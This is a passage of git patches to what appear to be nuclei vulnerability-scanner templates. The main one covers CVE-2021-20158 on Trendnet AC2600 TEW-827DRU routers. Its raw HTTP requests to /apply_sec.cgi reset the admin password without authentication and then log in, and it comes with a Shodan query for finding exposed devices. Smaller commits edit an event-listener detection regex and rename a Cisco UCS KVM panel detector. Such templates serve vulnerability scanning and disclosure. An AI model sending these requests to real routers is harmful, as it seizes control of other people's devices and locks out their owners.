b/cves/2021/CVE-2021-20158.yaml @@ -0,0 +1,59 @@ +id: CVE-2021-20158 + +info: + name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password change + author: gy741 + severity: critical + description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicous actor to force the change of the admin password due to a hidden administrative command. + reference: + - https://www.tenable.com/security/research/tra-2021-54 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20150 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-20158 + cwe-id: CWE-287 + metadata: + shodan-query: http.html:"TEW-827DRU" + tags: cve,cve2021,trendnet,disclosure,router + +requests: + - raw: + - | + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + + ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei + + POST /apply_sec.cgi HTTP/1.1 + Host: {{Hostname}} + + html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=bnVjbGVp&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id= + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'setConnectDevice' + - 'setInternet' + - 'setWlanSSID' + - 'TEW-827DRU' + condition: and + + - type: word + part: header + words: + - "text/html" + + extractors: + - type: regex + part: body + name: password + group: 1 + regex: + - '' From 685495df9137b5704fc1f639ebfcc428b80d5132 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Feb 2022 23:31:10 +0530 Subject: [PATCH 47/49] Update CVE-2021-20158.yaml --- cves/2021/CVE-2021-20158.yaml | 12 ++---------- 1 file changed, 2 insertions(+), 10 deletions(-) diff --git a/cves/2021/CVE-2021-20158.yaml b/cves/2021/CVE-2021-20158.yaml index 85c33d0745..72e4abc9a3 100644 --- a/cves/2021/CVE-2021-20158.yaml +++ b/cves/2021/CVE-2021-20158.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-287 metadata: shodan-query: http.html:"TEW-827DRU" - tags: cve,cve2021,trendnet,disclosure,router + tags: cve,cve2021,trendnet,disclosure,router,intrusive,dos requests: - raw: @@ -24,7 +24,7 @@ requests: Host: {{Hostname}} ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=nuclei - + - | POST /apply_sec.cgi HTTP/1.1 Host: {{Hostname}} @@ -49,11 +49,3 @@ requests: part: header words: - "text/html" - - extractors: - - type: regex - part: body - name: password - group: 1 - regex: - - '' From 00eca9b8777b17e983cb5ffbd202598c7c72ca93 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Feb 2022 23:45:48 +0530 Subject: [PATCH 48/49] Update addeventlistener-detect.yaml --- miscellaneous/addeventlistener-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/miscellaneous/addeventlistener-detect.yaml b/miscellaneous/addeventlistener-detect.yaml index c1bc920d1c..2d66e25559 100644 --- a/miscellaneous/addeventlistener-detect.yaml +++ b/miscellaneous/addeventlistener-detect.yaml @@ -2,7 +2,7 @@ id: addeventlistener-detect info: name: DOM EventListener detection - author: yavolo, dwisiswant0 + author: yavolo,dwisiswant0 severity: info tags: xss,misc reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source @@ -16,4 +16,4 @@ requests: - type: regex part: body regex: - - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118 \ No newline at end of file + - (([\w\_]+)\.)?add[Ee]vent[Ll]istener\(["']?[\w\_]+["']? # Test cases: https://www.regextester.com/?fam=121118 From 9a3975a9926ebd08faa9a247e3dc68330c99e7c3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 4 Feb 2022 23:52:34 +0530 Subject: [PATCH 49/49] Update and rename cisco-ucs-kvm-direct-login.yaml to cisco-ucs-kvm-login.yaml --- ...-ucs-kvm-direct-login.yaml => cisco-ucs-kvm-login.yaml} | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename exposed-panels/cisco/{cisco-ucs-kvm-direct-login.yaml => cisco-ucs-kvm-login.yaml} (90%) diff --git a/exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml b/exposed-panels/cisco/cisco-ucs-kvm-login.yaml similarity index 90% rename from exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml rename to exposed-panels/cisco/cisco-ucs-kvm-login.yaml index d4318f76ab..93aa6618f0 100644 --- a/exposed-panels/cisco/cisco-ucs-kvm-direct-login.yaml +++ b/exposed-panels/cisco/cisco-ucs-kvm-login.yaml @@ -1,14 +1,14 @@ -id: cisco-ucs-kvm-direct-login +id: cisco-ucs-kvm-login info: - name: Cisco UCS KVM Direct Login + name: Cisco UCS KVM Login author: idealphase severity: info description: The KVM console is an interface accessible from the Cisco UCS Manager GUI or the KVM Launch Manager that emulates a direct KVM connection. Unlike the KVM dongle, which requires you to be physically connected to the server, the KVM console allows you to connect to the server from a remote location across the network. reference: https://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/ucs-manager/GUI-User-Guides/Admin-Management/3-1/b_Cisco_UCS_Admin_Mgmt_Guide_3_1/b_Cisco_UCSM_GUI_Admin_Mgmt_Guide_3_1_chapter_01111.html - tags: panel,cisco metadata: shodan-query: 'http.title:"Cisco UCS KVM Direct"' + tags: panel,cisco,ucs,kvm requests: - method: GET @@ -18,6 +18,7 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - 'Cisco UCS KVM Direct'